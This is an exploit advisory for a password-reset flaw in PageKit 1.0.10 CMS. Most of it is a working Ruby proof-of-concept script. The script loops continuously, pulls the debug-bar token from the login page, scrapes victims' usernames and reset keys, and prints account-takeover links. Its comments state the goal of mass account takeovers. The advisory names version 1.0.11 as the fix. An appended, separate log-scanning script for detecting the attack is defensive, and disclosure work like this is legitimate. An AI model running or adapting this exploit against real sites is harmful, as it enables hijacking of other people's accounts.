PageKit 1.0.10 - Password Reset
Source: https://securelayer7.net  Author: Banawar  Published: 2017-01-23
# Exploit Title: Remote PageKit Password Reset Vulnerability
# Date: 21-01-2017
# Software Link: http://pagekit.com/
# Exploit Author: Saurabh Banawar from SecureLayer7
 
# Contact: http://twitter.com/securelayer7
# Website: https://securelayer7.net
# Category: webapps
 
1. Description
 
Any remote user can reset another user's password by reading the debug log.
The exploit succeeds only if the debug option is enabled in the Pagekit CMS.
 
The CMS pentest report can be found here:
https://securelayer7.net/download/pdf/SecureLayer7-Pentest-report-Pagekit-CMS.pdf
 
 
2. Proof of Concept
 
require 'net/http'
 
# Enter the domain/IP address of the site for which you want to test this vulnerability
vulnerableSite = 'http://127.0.0.1'
 
# This loop runs forever because we want to continuously monitor who is requesting
# a password reset and who has clicked on the link, so that mass account takeovers
# can be performed
loop do
  # We request the login page, which contains the debug parameter
  url = URI.parse(vulnerableSite + '/pagekit/index.php/user/login')
  request = Net::HTTP::Get.new(url.to_s)
  resp = Net::HTTP.start(url.host, url.port) { |http| http.request(request) }
 
  # The HTML source of the response is split with regular expressions to extract
  # the value of the _debug parameter
  bodyOfResponse = resp.body
  myArray1 = bodyOfResponse.split(/"current":"/)
  outputOfMyArray1 = myArray1[1]
  myArray2 = outputOfMyArray1.split(/"};/)
  theSecret = myArray2[0]
  puts ""
  puts "The secret token to debug link is: #{theSecret}"
  puts ""
 
  # Fetch the debug bar data using the extracted token
  url = URI.parse(vulnerableSite + '/pagekit/index.php/_debugbar/' + theSecret)
  request = Net::HTTP::Get.new(url.to_s)
  resp = Net::HTTP.start(url.host, url.port) { |http| http.request(request) }
  initial = resp.body
 
  # The number of victim users is found out
  users = initial.scan(/user=.+?(?=")/)
  c = users.count
  e = c.to_i
 
  # If the count is 0 then we continuously monitor it
  if c == 0
    puts "Currently no user has clicked on the reset password link."
    puts ""
    puts "Trying again..."
    puts ""
    puts ""
  # If the count is greater than 0 then it means we found a victim. So, find the
  # password reset link and display it in the console
  else
    link1 = vulnerableSite + "/pagekit/index.php/user/resetpassword/confirm?user="
    link2 = "&key="
    i = 0
    while i < e
      securityToken = ''
      a = users[i]
      b = a.split('=')
      c = b[1]
      d = c.split('\\')
      victimUserName = d[0]
      puts "The victim is: #{victimUserName}"
      f = b[2]
      securityToken = f.scan(/[^\\]/)
      securityTokenFiltered = securityToken.join
      puts "The security token of victim is: #{securityTokenFiltered}"
      puts "Link for account takeover"
      puts "#{link1}#{victimUserName}#{link2}#{securityTokenFiltered}"
      puts ""
      puts ""
      i += 1
    end
  end
end
 
 
 
3. Solution
 
Update to version 1.0.11
https://github.com/pagekit/pagekit/releases/tag/1.0.11
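 
A defender's complement to the advisory, added here and not part of the original: a Ruby script that scans web-server access logs for the pattern described above, a client reading the /_debugbar/ data and then following a password-reset confirmation link. The Apache-style log format and the sample lines (client IPs, token, usernames) are constructed assumptions; the Pagekit paths are the ones named in the advisory.

```ruby
# Added detection example (not from the advisory): find clients that read
# Pagekit's /_debugbar/ output and then confirm a password reset they never
# requested. Log format and sample lines are constructed assumptions.
require 'time'

LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Constructed sample access log; 203.0.113.7 is the suspicious client.
SAMPLE_LOG = <<~LOG
  198.51.100.4 - - [23/Jan/2017:10:00:01 +0000] "POST /pagekit/index.php/user/resetpassword HTTP/1.1" 302 0
  203.0.113.7 - - [23/Jan/2017:10:00:05 +0000] "GET /pagekit/index.php/user/login HTTP/1.1" 200 5120
  203.0.113.7 - - [23/Jan/2017:10:00:06 +0000] "GET /pagekit/index.php/_debugbar/Xa7bk2 HTTP/1.1" 200 9981
  203.0.113.7 - - [23/Jan/2017:10:00:09 +0000] "GET /pagekit/index.php/user/resetpassword/confirm?user=alice&key=3f9c HTTP/1.1" 200 4410
  198.51.100.4 - - [23/Jan/2017:10:02:00 +0000] "GET /pagekit/index.php/user/resetpassword/confirm?user=bob&key=77aa HTTP/1.1" 200 4410
LOG

# Parse one combined-format line into a hash, or nil if it does not match.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Report every client that successfully read /_debugbar/ (debug mode must be
# off in production, so any hit is worth a look) together with the usernames
# whose reset links it confirmed after that read.
def find_debugbar_abuse(log_text)
  events = log_text.each_line.map { |l| parse_line(l) }.compact
  findings = []
  events.group_by { |e| e[:ip] }.each do |ip, evs|
    debug_reads = evs.select { |e| e[:path].include?('/_debugbar/') && e[:status] == 200 }
    next if debug_reads.empty?
    first_read = debug_reads.map { |e| e[:time] }.min
    confirmed = evs.select { |e| e[:time] >= first_read && e[:path] =~ %r{/resetpassword/confirm\?} }
                   .map { |e| e[:path][/user=([^&]+)/, 1] }.compact
    findings << { ip: ip, debugbar_reads: debug_reads.size, confirmed_users: confirmed }
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  find_debugbar_abuse(SAMPLE_LOG).each do |f|
    puts "#{f[:ip]}: #{f[:debugbar_reads]} debugbar read(s), reset confirmed for #{f[:confirmed_users].inspect}"
  end
end
```

On real logs, feed the file contents to find_debugbar_abuse; the 198.51.100.4 confirm in the sample is not flagged because that client never touched /_debugbar/.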
 